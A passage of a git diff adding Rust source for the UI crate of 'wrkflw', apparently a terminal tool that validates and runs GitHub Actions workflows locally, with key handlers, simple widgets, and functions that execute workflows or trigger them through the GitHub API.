|
||||
"[{}] Attempting to reset workflow status...",
|
||||
timestamp
|
||||
));
|
||||
app.reset_workflow_status();
|
||||
|
||||
// Force redraw to update UI immediately
|
||||
terminal.draw(|f| {
|
||||
render_ui(f, app);
|
||||
})?;
|
||||
} else {
|
||||
app.logs.push(format!(
|
||||
"[{}] Cannot reset workflow while another operation is running",
|
||||
timestamp
|
||||
));
|
||||
}
|
||||
}
|
||||
KeyCode::Char('?') => {
|
||||
// Toggle help overlay
|
||||
app.show_help = !app.show_help;
|
||||
}
|
||||
KeyCode::Char('t') => {
|
||||
// Only trigger workflow if not already running and we're in the workflows tab
|
||||
if !app.running && app.selected_tab == 0 {
|
||||
if let Some(selected_idx) = app.workflow_list_state.selected() {
|
||||
if selected_idx < app.workflows.len() {
|
||||
let workflow = &app.workflows[selected_idx];
|
||||
if workflow.status == WorkflowStatus::NotStarted {
|
||||
app.trigger_selected_workflow();
|
||||
} else if workflow.status == WorkflowStatus::Running {
|
||||
app.logs.push(format!(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Workflow '{}' is already running",
|
||||
workflow.name
|
||||
));
|
||||
} else {
|
||||
// First, get all the data we need from the workflow
|
||||
let workflow_name = workflow.name.clone();
|
||||
let status_text = match workflow.status {
|
||||
WorkflowStatus::Success => "Success",
|
||||
WorkflowStatus::Failed => "Failed",
|
||||
WorkflowStatus::Skipped => "Skipped",
|
||||
_ => "current",
|
||||
};
|
||||
let needs_reset_hint = workflow.status
|
||||
== WorkflowStatus::Success
|
||||
|| workflow.status == WorkflowStatus::Failed
|
||||
|| workflow.status == WorkflowStatus::Skipped;
|
||||
|
||||
// Now set the status message (mutable borrow)
|
||||
app.set_status_message(format!(
|
||||
"Cannot trigger workflow '{}' in {} state. Press Shift+R to reset.",
|
||||
workflow_name,
|
||||
status_text
|
||||
));
|
||||
|
||||
// Add log entries
|
||||
app.logs.push(format!(
|
||||
"Cannot trigger workflow '{}' in {} state",
|
||||
workflow_name, status_text
|
||||
));
|
||||
|
||||
// Add hint about using reset
|
||||
if needs_reset_hint {
|
||||
let timestamp =
|
||||
Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs.push(format!(
|
||||
"[{}] Hint: Press 'Shift+R' to reset the workflow status and allow triggering",
|
||||
timestamp
|
||||
));
|
||||
}
|
||||
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Cannot trigger workflow in {} state",
|
||||
status_text
|
||||
));
|
||||
}
|
||||
}
|
||||
} else {
|
||||
app.logs.push("No workflow selected to trigger".to_string());
|
||||
wrkflw_logging::warning("No workflow selected to trigger");
|
||||
}
|
||||
} else if app.running {
|
||||
app.logs.push(
|
||||
"Cannot trigger workflow while another operation is in progress"
|
||||
.to_string(),
|
||||
);
|
||||
wrkflw_logging::warning(
|
||||
"Cannot trigger workflow while another operation is in progress",
|
||||
);
|
||||
} else if app.selected_tab != 0 {
|
||||
app.logs
|
||||
.push("Switch to Workflows tab to trigger a workflow".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Switch to Workflows tab to trigger a workflow",
|
||||
);
|
||||
// For better UX, we could also automatically switch to the Workflows tab here
|
||||
app.switch_tab(0);
|
||||
}
|
||||
}
|
||||
KeyCode::Char('s') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.toggle_log_search();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('f') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.toggle_log_filter();
|
||||
}
|
||||
}
|
||||
KeyCode::Char('c') => {
|
||||
if app.selected_tab == 2 {
|
||||
app.clear_log_search_and_filter();
|
||||
}
|
||||
}
|
||||
KeyCode::Char(c) => {
|
||||
if app.selected_tab == 2 && app.log_search_active {
|
||||
app.handle_log_search_input(KeyCode::Char(c));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
1069
crates/ui/src/app/state.rs
Normal file
1069
crates/ui/src/app/state.rs
Normal file
File diff suppressed because it is too large
Load Diff
53
crates/ui/src/components/button.rs
Normal file
53
crates/ui/src/components/button.rs
Normal file
@@ -0,0 +1,53 @@
|
||||
// Button component
|
||||
use ratatui::{
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
};
|
||||
|
||||
/// A simple button component for the TUI
|
||||
pub struct Button {
|
||||
pub label: String,
|
||||
pub is_selected: bool,
|
||||
pub is_active: bool,
|
||||
}
|
||||
|
||||
impl Button {
|
||||
/// Create a new button
|
||||
pub fn new(label: &str) -> Self {
|
||||
Button {
|
||||
label: label.to_string(),
|
||||
is_selected: false,
|
||||
is_active: true,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set selected state
|
||||
pub fn selected(mut self, is_selected: bool) -> Self {
|
||||
self.is_selected = is_selected;
|
||||
self
|
||||
}
|
||||
|
||||
/// Set active state
|
||||
pub fn active(mut self, is_active: bool) -> Self {
|
||||
self.is_active = is_active;
|
||||
self
|
||||
}
|
||||
|
||||
/// Render the button
|
||||
pub fn render(&self) -> Paragraph<'_> {
|
||||
let (fg, bg) = match (self.is_selected, self.is_active) {
|
||||
(true, true) => (Color::Black, Color::Yellow),
|
||||
(true, false) => (Color::Black, Color::DarkGray),
|
||||
(false, true) => (Color::White, Color::Blue),
|
||||
(false, false) => (Color::DarkGray, Color::Black),
|
||||
};
|
||||
|
||||
let style = Style::default().fg(fg).bg(bg).add_modifier(Modifier::BOLD);
|
||||
|
||||
Paragraph::new(Line::from(vec![Span::styled(
|
||||
format!(" {} ", self.label),
|
||||
style,
|
||||
)]))
|
||||
}
|
||||
}
|
||||
60
crates/ui/src/components/checkbox.rs
Normal file
60
crates/ui/src/components/checkbox.rs
Normal file
@@ -0,0 +1,60 @@
|
||||
// Checkbox component
|
||||
use ratatui::{
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
};
|
||||
|
||||
/// A simple checkbox component for the TUI
|
||||
pub struct Checkbox {
|
||||
pub label: String,
|
||||
pub is_checked: bool,
|
||||
pub is_selected: bool,
|
||||
}
|
||||
|
||||
impl Checkbox {
|
||||
/// Create a new checkbox
|
||||
pub fn new(label: &str) -> Self {
|
||||
Checkbox {
|
||||
label: label.to_string(),
|
||||
is_checked: false,
|
||||
is_selected: false,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set checked state
|
||||
pub fn checked(mut self, is_checked: bool) -> Self {
|
||||
self.is_checked = is_checked;
|
||||
self
|
||||
}
|
||||
|
||||
/// Set selected state
|
||||
pub fn selected(mut self, is_selected: bool) -> Self {
|
||||
self.is_selected = is_selected;
|
||||
self
|
||||
}
|
||||
|
||||
/// Toggle checked state
|
||||
pub fn toggle(&mut self) {
|
||||
self.is_checked = !self.is_checked;
|
||||
}
|
||||
|
||||
/// Render the checkbox
|
||||
pub fn render(&self) -> Paragraph<'_> {
|
||||
let checkbox = if self.is_checked { "[✓]" } else { "[ ]" };
|
||||
|
||||
let style = if self.is_selected {
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD)
|
||||
} else {
|
||||
Style::default().fg(Color::White)
|
||||
};
|
||||
|
||||
Paragraph::new(Line::from(vec![
|
||||
Span::styled(checkbox, style),
|
||||
Span::raw(" "),
|
||||
Span::styled(&self.label, style),
|
||||
]))
|
||||
}
|
||||
}
|
||||
12
crates/ui/src/components/mod.rs
Normal file
12
crates/ui/src/components/mod.rs
Normal file
@@ -0,0 +1,12 @@
|
||||
// UI Components
|
||||
mod button;
|
||||
mod checkbox;
|
||||
mod progress_bar;
|
||||
|
||||
// Re-export components for easier access
|
||||
pub use button::Button;
|
||||
pub use checkbox::Checkbox;
|
||||
pub use progress_bar::ProgressBar;
|
||||
|
||||
// This module will contain smaller reusable UI elements that
|
||||
// can be shared between different views of the application.
|
||||
53
crates/ui/src/components/progress_bar.rs
Normal file
53
crates/ui/src/components/progress_bar.rs
Normal file
@@ -0,0 +1,53 @@
|
||||
// Progress bar component
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
widgets::Gauge,
|
||||
};
|
||||
|
||||
/// A simple progress bar component for the TUI
|
||||
pub struct ProgressBar {
|
||||
pub progress: f64,
|
||||
pub label: Option<String>,
|
||||
pub color: Color,
|
||||
}
|
||||
|
||||
impl ProgressBar {
|
||||
/// Create a new progress bar
|
||||
pub fn new(progress: f64) -> Self {
|
||||
ProgressBar {
|
||||
progress: progress.clamp(0.0, 1.0),
|
||||
label: None,
|
||||
color: Color::Blue,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set label
|
||||
pub fn label(mut self, label: &str) -> Self {
|
||||
self.label = Some(label.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
/// Set color
|
||||
pub fn color(mut self, color: Color) -> Self {
|
||||
self.color = color;
|
||||
self
|
||||
}
|
||||
|
||||
/// Update progress value
|
||||
pub fn update(&mut self, progress: f64) {
|
||||
self.progress = progress.clamp(0.0, 1.0);
|
||||
}
|
||||
|
||||
/// Render the progress bar
|
||||
pub fn render(&self) -> Gauge<'_> {
|
||||
let label = match &self.label {
|
||||
Some(lbl) => format!("{} {:.0}%", lbl, self.progress * 100.0),
|
||||
None => format!("{:.0}%", self.progress * 100.0),
|
||||
};
|
||||
|
||||
Gauge::default()
|
||||
.gauge_style(Style::default().fg(self.color).bg(Color::Black))
|
||||
.label(label)
|
||||
.ratio(self.progress)
|
||||
}
|
||||
}
|
||||
3
crates/ui/src/handlers/mod.rs
Normal file
3
crates/ui/src/handlers/mod.rs
Normal file
@@ -0,0 +1,3 @@
|
||||
// Handlers for the UI
|
||||
|
||||
pub mod workflow;
|
||||
567
crates/ui/src/handlers/workflow.rs
Normal file
567
crates/ui/src/handlers/workflow.rs
Normal file
@@ -0,0 +1,567 @@
|
||||
// Workflow handlers
|
||||
use crate::app::App;
|
||||
use crate::models::{ExecutionResultMsg, WorkflowExecution, WorkflowStatus};
|
||||
use chrono::Local;
|
||||
use std::io;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use wrkflw_evaluator::evaluate_workflow_file;
|
||||
use wrkflw_executor::{self, JobStatus, RuntimeType, StepStatus};
|
||||
|
||||
// Validate a workflow or directory containing workflows
|
||||
pub fn validate_workflow(path: &Path, verbose: bool) -> io::Result<()> {
|
||||
let mut workflows = Vec::new();
|
||||
|
||||
if path.is_dir() {
|
||||
let entries = std::fs::read_dir(path)?;
|
||||
|
||||
for entry in entries {
|
||||
let entry = entry?;
|
||||
let entry_path = entry.path();
|
||||
|
||||
if entry_path.is_file() && wrkflw_utils::is_workflow_file(&entry_path) {
|
||||
workflows.push(entry_path);
|
||||
}
|
||||
}
|
||||
} else if path.is_file() {
|
||||
workflows.push(PathBuf::from(path));
|
||||
} else {
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::NotFound,
|
||||
format!("Path does not exist: {}", path.display()),
|
||||
));
|
||||
}
|
||||
|
||||
let mut valid_count = 0;
|
||||
let mut invalid_count = 0;
|
||||
|
||||
println!("Validating {} workflow file(s)...", workflows.len());
|
||||
|
||||
for workflow_path in workflows {
|
||||
match evaluate_workflow_file(&workflow_path, verbose) {
|
||||
Ok(result) => {
|
||||
if result.is_valid {
|
||||
println!("✅ Valid: {}", workflow_path.display());
|
||||
valid_count += 1;
|
||||
} else {
|
||||
println!("❌ Invalid: {}", workflow_path.display());
|
||||
for (i, issue) in result.issues.iter().enumerate() {
|
||||
println!(" {}. {}", i + 1, issue);
|
||||
}
|
||||
invalid_count += 1;
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Error processing {}: {}", workflow_path.display(), e);
|
||||
invalid_count += 1;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!(
|
||||
"\nSummary: {} valid, {} invalid",
|
||||
valid_count, invalid_count
|
||||
);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
// Execute a workflow through the CLI
|
||||
pub async fn execute_workflow_cli(
|
||||
path: &Path,
|
||||
runtime_type: RuntimeType,
|
||||
verbose: bool,
|
||||
) -> io::Result<()> {
|
||||
if !path.exists() {
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::NotFound,
|
||||
format!("Workflow file does not exist: {}", path.display()),
|
||||
));
|
||||
}
|
||||
|
||||
println!("Validating workflow...");
|
||||
match evaluate_workflow_file(path, false) {
|
||||
Ok(result) => {
|
||||
if !result.is_valid {
|
||||
println!("❌ Cannot execute invalid workflow: {}", path.display());
|
||||
for (i, issue) in result.issues.iter().enumerate() {
|
||||
println!(" {}. {}", i + 1, issue);
|
||||
}
|
||||
return Err(io::Error::new(
|
||||
io::ErrorKind::InvalidData,
|
||||
"Workflow validation failed",
|
||||
));
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
return Err(io::Error::other(format!(
|
||||
"Error validating workflow: {}",
|
||||
e
|
||||
)));
|
||||
}
|
||||
}
|
||||
|
||||
// Check container runtime availability if container runtime is selected
|
||||
let runtime_type = match runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
if !wrkflw_executor::docker::is_available() {
|
||||
println!("⚠️ Docker is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Docker is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
if !wrkflw_executor::podman::is_available() {
|
||||
println!("⚠️ Podman is not available. Using emulation mode instead.");
|
||||
wrkflw_logging::warning("Podman is not available. Using emulation mode instead.");
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
println!("Executing workflow: {}", path.display());
|
||||
println!("Runtime mode: {:?}", runtime_type);
|
||||
|
||||
// Log the start of the execution in debug mode with more details
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Starting workflow execution: path={}, runtime={:?}, verbose={}",
|
||||
path.display(),
|
||||
runtime_type,
|
||||
verbose
|
||||
));
|
||||
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure: false, // Default for this path
|
||||
};
|
||||
|
||||
match wrkflw_executor::execute_workflow(path, config).await {
|
||||
Ok(result) => {
|
||||
println!("\nWorkflow execution results:");
|
||||
|
||||
// Track if the workflow had any failures
|
||||
let mut any_job_failed = false;
|
||||
|
||||
for job in &result.jobs {
|
||||
match job.status {
|
||||
JobStatus::Success => {
|
||||
println!("\n✅ Job succeeded: {}", job.name);
|
||||
}
|
||||
JobStatus::Failure => {
|
||||
println!("\n❌ Job failed: {}", job.name);
|
||||
any_job_failed = true;
|
||||
}
|
||||
JobStatus::Skipped => {
|
||||
println!("\n⏭️ Job skipped: {}", job.name);
|
||||
}
|
||||
}
|
||||
|
||||
println!("-------------------------");
|
||||
|
||||
// Log the job details for debug purposes
|
||||
wrkflw_logging::debug(&format!("Job: {}, Status: {:?}", job.name, job.status));
|
||||
|
||||
for step in job.steps.iter() {
|
||||
match step.status {
|
||||
StepStatus::Success => {
|
||||
println!(" ✅ {}", step.name);
|
||||
|
||||
// Check if this is a GitHub action output that should be hidden
|
||||
let should_hide = std::env::var("WRKFLW_HIDE_ACTION_MESSAGES")
|
||||
.map(|val| val == "true")
|
||||
.unwrap_or(false)
|
||||
&& step.output.contains("Would execute GitHub action:");
|
||||
|
||||
// Only show output if not hidden and it's short
|
||||
if !should_hide
|
||||
&& !step.output.trim().is_empty()
|
||||
&& step.output.lines().count() <= 3
|
||||
{
|
||||
// For short outputs, show directly
|
||||
println!(" {}", step.output.trim());
|
||||
}
|
||||
}
|
||||
StepStatus::Failure => {
|
||||
println!(" ❌ {}", step.name);
|
||||
|
||||
// Ensure we capture and show exit code
|
||||
if let Some(exit_code) = step
|
||||
.output
|
||||
.lines()
|
||||
.find(|line| line.trim().starts_with("Exit code:"))
|
||||
.map(|line| line.trim().to_string())
|
||||
{
|
||||
println!(" {}", exit_code);
|
||||
}
|
||||
|
||||
// Show command/run details in debug mode
|
||||
if wrkflw_logging::get_log_level() <= wrkflw_logging::LogLevel::Debug {
|
||||
if let Some(cmd_output) = step
|
||||
.output
|
||||
.lines()
|
||||
.skip_while(|l| !l.trim().starts_with("$"))
|
||||
.take(1)
|
||||
.next()
|
||||
{
|
||||
println!(" Command: {}", cmd_output.trim());
|
||||
}
|
||||
}
|
||||
|
||||
// Always show error output from failed steps, but keep it to a reasonable length
|
||||
let output_lines: Vec<&str> = step
|
||||
.output
|
||||
.lines()
|
||||
.filter(|line| !line.trim().starts_with("Exit code:"))
|
||||
.collect();
|
||||
|
||||
if !output_lines.is_empty() {
|
||||
println!(" Error output:");
|
||||
for line in output_lines.iter().take(10) {
|
||||
println!(" {}", line.trim().replace('\n', "\n "));
|
||||
}
|
||||
|
||||
if output_lines.len() > 10 {
|
||||
println!(
|
||||
" ... (and {} more lines)",
|
||||
output_lines.len() - 10
|
||||
);
|
||||
println!(" Use --debug to see full output");
|
||||
}
|
||||
}
|
||||
}
|
||||
StepStatus::Skipped => {
|
||||
println!(" ⏭️ {} (skipped)", step.name);
|
||||
}
|
||||
}
|
||||
|
||||
// Always log the step details for debug purposes
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step: {}, Status: {:?}, Output length: {} lines",
|
||||
step.name,
|
||||
step.status,
|
||||
step.output.lines().count()
|
||||
));
|
||||
|
||||
// In debug mode, log all step output
|
||||
if wrkflw_logging::get_log_level() == wrkflw_logging::LogLevel::Debug
|
||||
&& !step.output.trim().is_empty()
|
||||
{
|
||||
wrkflw_logging::debug(&format!(
|
||||
"Step output for '{}': \n{}",
|
||||
step.name, step.output
|
||||
));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if any_job_failed {
|
||||
println!("\n❌ Workflow completed with failures");
|
||||
// In the case of failure, we'll also inform the user about the debug option
|
||||
// if they're not already using it
|
||||
if wrkflw_logging::get_log_level() > wrkflw_logging::LogLevel::Debug {
|
||||
println!(" Run with --debug for more detailed output");
|
||||
}
|
||||
} else {
|
||||
println!("\n✅ Workflow completed successfully!");
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
Err(e) => {
|
||||
println!("❌ Failed to execute workflow: {}", e);
|
||||
wrkflw_logging::error(&format!("Failed to execute workflow: {}", e));
|
||||
Err(io::Error::other(e))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper function to execute workflow trigger using curl
|
||||
pub async fn execute_curl_trigger(
|
||||
workflow_name: &str,
|
||||
branch: Option<&str>,
|
||||
) -> Result<(Vec<wrkflw_executor::JobResult>, ()), String> {
|
||||
// Get GitHub token
|
||||
let token = std::env::var("GITHUB_TOKEN").map_err(|_| {
|
||||
"GitHub token not found. Please set GITHUB_TOKEN environment variable".to_string()
|
||||
})?;
|
||||
|
||||
// Debug log to check if GITHUB_TOKEN is set
|
||||
match std::env::var("GITHUB_TOKEN") {
|
||||
Ok(token) => wrkflw_logging::info(&format!("GITHUB_TOKEN is set: {}", &token[..5])), // Log first 5 characters for security
|
||||
Err(_) => wrkflw_logging::error("GITHUB_TOKEN is not set"),
|
||||
}
|
||||
|
||||
// Get repository information
|
||||
let repo_info = wrkflw_github::get_repo_info()
|
||||
.map_err(|e| format!("Failed to get repository info: {}", e))?;
|
||||
|
||||
// Determine branch to use
|
||||
let branch_ref = branch.unwrap_or(&repo_info.default_branch);
|
||||
|
||||
// Extract just the workflow name from the path if it's a full path
|
||||
let workflow_name = if workflow_name.contains('/') {
|
||||
Path::new(workflow_name)
|
||||
.file_stem()
|
||||
.and_then(|s| s.to_str())
|
||||
.ok_or_else(|| "Invalid workflow name".to_string())?
|
||||
} else {
|
||||
workflow_name
|
||||
};
|
||||
|
||||
wrkflw_logging::info(&format!("Using workflow name: {}", workflow_name));
|
||||
|
||||
// Construct JSON payload
|
||||
let payload = serde_json::json!({
|
||||
"ref": branch_ref
|
||||
});
|
||||
|
||||
// Construct API URL
|
||||
let url = format!(
|
||||
"https://api.github.com/repos/{}/{}/actions/workflows/{}.yml/dispatches",
|
||||
repo_info.owner, repo_info.repo, workflow_name
|
||||
);
|
||||
|
||||
wrkflw_logging::info(&format!("Triggering workflow at URL: {}", url));
|
||||
|
||||
// Create a reqwest client
|
||||
let client = reqwest::Client::new();
|
||||
|
||||
// Send the request using reqwest
|
||||
let response = client
|
||||
.post(&url)
|
||||
.header("Authorization", format!("Bearer {}", token.trim()))
|
||||
.header("Accept", "application/vnd.github.v3+json")
|
||||
.header("Content-Type", "application/json")
|
||||
.header("User-Agent", "wrkflw-cli")
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.map_err(|e| format!("Failed to send request: {}", e))?;
|
||||
|
||||
if !response.status().is_success() {
|
||||
let status = response.status().as_u16();
|
||||
let error_message = response
|
||||
.text()
|
||||
.await
|
||||
.unwrap_or_else(|_| format!("Unknown error (HTTP {})", status));
|
||||
|
||||
return Err(format!("API error: {} - {}", status, error_message));
|
||||
}
|
||||
|
||||
// Success message with URL to view the workflow
|
||||
let success_msg = format!(
|
||||
"Workflow triggered successfully. View it at: https://github.com/{}/{}/actions/workflows/{}.yml",
|
||||
repo_info.owner, repo_info.repo, workflow_name
|
||||
);
|
||||
|
||||
// Create a job result structure
|
||||
let job_result = wrkflw_executor::JobResult {
|
||||
name: "GitHub Trigger".to_string(),
|
||||
status: wrkflw_executor::JobStatus::Success,
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Remote Trigger".to_string(),
|
||||
status: wrkflw_executor::StepStatus::Success,
|
||||
output: success_msg,
|
||||
}],
|
||||
logs: "Workflow triggered remotely on GitHub".to_string(),
|
||||
};
|
||||
|
||||
Ok((vec![job_result], ()))
|
||||
}
|
||||
|
||||
// Extract common workflow execution logic to avoid duplication
|
||||
pub fn start_next_workflow_execution(
|
||||
app: &mut App,
|
||||
tx_clone: &mpsc::Sender<ExecutionResultMsg>,
|
||||
verbose: bool,
|
||||
) {
|
||||
if let Some(next_idx) = app.get_next_workflow_to_execute() {
|
||||
app.current_execution = Some(next_idx);
|
||||
let tx_clone_inner = tx_clone.clone();
|
||||
let workflow_path = app.workflows[next_idx].path.clone();
|
||||
|
||||
// Log whether verbose mode is enabled
|
||||
if verbose {
|
||||
app.logs
|
||||
.push("Verbose mode: Step outputs will be displayed in full".to_string());
|
||||
wrkflw_logging::info("Verbose mode: Step outputs will be displayed in full");
|
||||
} else {
|
||||
app.logs.push(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)"
|
||||
.to_string(),
|
||||
);
|
||||
wrkflw_logging::info(
|
||||
"Standard mode: Only step status will be shown (use --verbose for full output)",
|
||||
);
|
||||
}
|
||||
|
||||
// Check container runtime availability again if container runtime is selected
|
||||
let runtime_type = match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Use safe FD redirection to check Docker availability
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_docker_available {
|
||||
app.logs
|
||||
.push("Docker is not available. Using emulation mode instead.".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Docker is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Docker
|
||||
}
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Use safe FD redirection to check Podman availability
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
if !is_podman_available {
|
||||
app.logs
|
||||
.push("Podman is not available. Using emulation mode instead.".to_string());
|
||||
wrkflw_logging::warning(
|
||||
"Podman is not available. Using emulation mode instead.",
|
||||
);
|
||||
RuntimeType::Emulation
|
||||
} else {
|
||||
RuntimeType::Podman
|
||||
}
|
||||
}
|
||||
RuntimeType::SecureEmulation => RuntimeType::SecureEmulation,
|
||||
RuntimeType::Emulation => RuntimeType::Emulation,
|
||||
};
|
||||
|
||||
let validation_mode = app.validation_mode;
|
||||
let preserve_containers_on_failure = app.preserve_containers_on_failure;
|
||||
|
||||
// Update workflow status and add execution details
|
||||
app.workflows[next_idx].status = WorkflowStatus::Running;
|
||||
|
||||
// Initialize execution details if not already done
|
||||
if app.workflows[next_idx].execution_details.is_none() {
|
||||
app.workflows[next_idx].execution_details = Some(WorkflowExecution {
|
||||
jobs: Vec::new(),
|
||||
start_time: Local::now(),
|
||||
end_time: None,
|
||||
logs: Vec::new(),
|
||||
progress: 0.0,
|
||||
});
|
||||
}
|
||||
|
||||
thread::spawn(move || {
|
||||
let rt = match tokio::runtime::Runtime::new() {
|
||||
Ok(runtime) => runtime,
|
||||
Err(e) => {
|
||||
let _ = tx_clone_inner.send((
|
||||
next_idx,
|
||||
Err(format!("Failed to create Tokio runtime: {}", e)),
|
||||
));
|
||||
return;
|
||||
}
|
||||
};
|
||||
|
||||
let result = rt.block_on(async {
|
||||
if validation_mode {
|
||||
// Perform validation instead of execution
|
||||
match evaluate_workflow_file(&workflow_path, verbose) {
|
||||
Ok(validation_result) => {
|
||||
// Create execution result based on validation
|
||||
let status = if validation_result.is_valid {
|
||||
wrkflw_executor::JobStatus::Success
|
||||
} else {
|
||||
wrkflw_executor::JobStatus::Failure
|
||||
};
|
||||
|
||||
// Create a synthetic job result for validation
|
||||
let jobs = vec![wrkflw_executor::JobResult {
|
||||
name: "Validation".to_string(),
|
||||
status,
|
||||
steps: vec![wrkflw_executor::StepResult {
|
||||
name: "Validator".to_string(),
|
||||
status: if validation_result.is_valid {
|
||||
wrkflw_executor::StepStatus::Success
|
||||
} else {
|
||||
wrkflw_executor::StepStatus::Failure
|
||||
},
|
||||
output: validation_result.issues.join("\n"),
|
||||
}],
|
||||
logs: format!(
|
||||
"Validation result: {}",
|
||||
if validation_result.is_valid {
|
||||
"PASSED"
|
||||
} else {
|
||||
"FAILED"
|
||||
}
|
||||
),
|
||||
}];
|
||||
|
||||
Ok((jobs, ()))
|
||||
}
|
||||
Err(e) => Err(e.to_string()),
|
||||
}
|
||||
} else {
|
||||
// Use safe FD redirection for execution
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type,
|
||||
verbose,
|
||||
preserve_containers_on_failure,
|
||||
};
|
||||
|
||||
let execution_result = wrkflw_utils::fd::with_stderr_to_null(|| {
|
||||
futures::executor::block_on(async {
|
||||
wrkflw_executor::execute_workflow(&workflow_path, config).await
|
||||
})
|
||||
})
|
||||
.map_err(|e| format!("Failed to redirect stderr during execution: {}", e))?;
|
||||
|
||||
match execution_result {
|
||||
Ok(execution_result) => {
|
||||
// Send back the job results in a wrapped result
|
||||
Ok((execution_result.jobs, ()))
|
||||
}
|
||||
Err(e) => Err(e.to_string()),
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
// Only send if we get a valid result
|
||||
if let Err(e) = tx_clone_inner.send((next_idx, result)) {
|
||||
wrkflw_logging::error(&format!("Error sending execution result: {}", e));
|
||||
}
|
||||
});
|
||||
} else {
|
||||
app.running = false;
|
||||
let timestamp = Local::now().format("%H:%M:%S").to_string();
|
||||
app.logs
|
||||
.push(format!("[{}] All workflows completed execution", timestamp));
|
||||
wrkflw_logging::info("All workflows completed execution");
|
||||
}
|
||||
}
|
||||
23
crates/ui/src/lib.rs
Normal file
23
crates/ui/src/lib.rs
Normal file
@@ -0,0 +1,23 @@
|
||||
// Modular UI crate for wrkflw
|
||||
//
|
||||
// This crate is organized into several modules:
|
||||
// - app: Contains the main App state and TUI entry point
|
||||
// - models: Contains the data structures for the UI
|
||||
// - components: Contains reusable UI elements
|
||||
// - handlers: Contains workflow handling logic
|
||||
// - utils: Contains utility functions
|
||||
// - views: Contains UI rendering code
|
||||
|
||||
// Re-export public modules
|
||||
pub mod app;
|
||||
pub mod components;
|
||||
pub mod handlers;
|
||||
pub mod log_processor;
|
||||
pub mod models;
|
||||
pub mod utils;
|
||||
pub mod views;
|
||||
|
||||
// Re-export main entry points
|
||||
pub use app::run_wrkflw_tui;
|
||||
pub use handlers::workflow::execute_workflow_cli;
|
||||
pub use handlers::workflow::validate_workflow;
|
||||
305
crates/ui/src/log_processor.rs
Normal file
305
crates/ui/src/log_processor.rs
Normal file
@@ -0,0 +1,305 @@
|
||||
// Background log processor for asynchronous log filtering and formatting
|
||||
use crate::models::LogFilterLevel;
|
||||
use ratatui::{
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Cell, Row},
|
||||
};
|
||||
use std::sync::mpsc;
|
||||
use std::thread;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
/// Processed log entry ready for rendering
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProcessedLogEntry {
|
||||
pub timestamp: String,
|
||||
pub log_type: String,
|
||||
pub log_style: Style,
|
||||
pub content_spans: Vec<Span<'static>>,
|
||||
}
|
||||
|
||||
impl ProcessedLogEntry {
|
||||
